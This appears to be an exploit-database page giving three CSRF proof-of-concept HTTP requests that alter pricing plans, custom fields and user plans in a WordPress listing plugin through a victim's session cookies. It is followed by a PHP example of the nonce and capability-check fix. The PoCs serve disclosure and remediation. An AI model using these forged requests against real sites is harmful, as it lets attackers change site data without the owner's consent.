## https://sploitus.com/exploit?id=WPEX-ID:FAE06FBC-A128-43FF-8F2A-7886957D8881
PoC | CSRF | Add/Edit Pricing Plans:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [agent or admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 265

action=action_save_post&post_id=66&data%5Bprice%5D=1337&data%5Btype%5D=limit_count&data%5Btitle%5D=PoC&data%5Bstatus%5D=active&data%5Bduration%5D=13&data%5Bduration_type%5D=year&data%5Bfeature_limit%5D=0&data%5Blisting_limit%5D=31337&data%5Bpayment_type%5D=one_time
```

PoC | CSRF | Add/Edit Custom Fields:

```http
POST /wp-admin/admin.php?page=listing_attribute HTTP/2
Host: example.com
Cookie: [cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 268

StmListingAttribute%5Bid%5D=16&StmListingAttribute%5Bname%5D=accessories&StmListingAttribute%5Btype%5D=multiselect&action=listing_attribute_save&StmListingAttribute%5Btitle%5D=PoC&StmListingAttribute%5Baffix%5D=&icon_type=0&StmListingAttribute%5Bicon%5D=&submit=Update
```

PoC | CSRF | User Plan Edit:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 85

action=stm_create_user_plan&status=active&plan=13&expired_date=28-02-2022&user=1&id=1
```
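All three requests succeed because the handlers accept the victim's session cookie as the only proof of intent. The following is an added illustration of the standard WordPress fix for the first PoC's `action_save_post` handler; it is not the affected plugin's code, and the nonce action name `stm_save_post`, the `nonce` parameter name and the `plan` meta key are assumptions.

```php
<?php
// Added illustration, not the affected plugin's code. Shows the missing
// checks for the "action_save_post" AJAX action from the first PoC request.
// 'stm_save_post', the 'nonce' parameter and the 'plan' meta key are assumed.

// Vulnerable pattern: the cookie alone authorises the write, so a page the
// logged-in admin visits can submit the PoC request from another origin.
function vulnerable_action_save_post() {
    $post_id = absint( $_POST['post_id'] );
    $data    = (array) $_POST['data'];
    update_post_meta( $post_id, 'plan', $data ); // no nonce, no capability check
    wp_send_json_success();
}

// Hardened pattern: a per-session nonce proves the request originated from
// the plugin's own admin UI, and a capability check bounds who may call it.
function hardened_action_save_post() {
    // Sends a 403 and dies unless $_POST['nonce'] is a valid 'stm_save_post'
    // nonce for the current user; a cross-site form cannot know this value.
    check_ajax_referer( 'stm_save_post', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
    $raw     = isset( $_POST['data'] ) ? (array) wp_unslash( $_POST['data'] ) : array();
    $data    = array_map( 'sanitize_text_field', $raw );

    if ( ! $post_id || ! get_post( $post_id ) ) {
        wp_send_json_error( 'invalid plan', 400 );
    }

    update_post_meta( $post_id, 'plan', $data );
    wp_send_json_success();
}
// Registered for logged-in users only; no 'wp_ajax_nopriv_' counterpart.
add_action( 'wp_ajax_action_save_post', 'hardened_action_save_post' );

// The legitimate editor page hands its script a fresh nonce; the PoC body
// above has no equivalent field, so the hardened handler rejects it.
function enqueue_plan_editor_script() {
    wp_enqueue_script( 'plan-editor', plugins_url( 'plan-editor.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'plan-editor', 'planEditor', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'stm_save_post' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'enqueue_plan_editor_script' );
```

The second PoC is a plain admin-page form rather than an AJAX call, so the equivalent fix there is `wp_nonce_field()` in the form and `check_admin_referer()` in the `listing_attribute_save` handler.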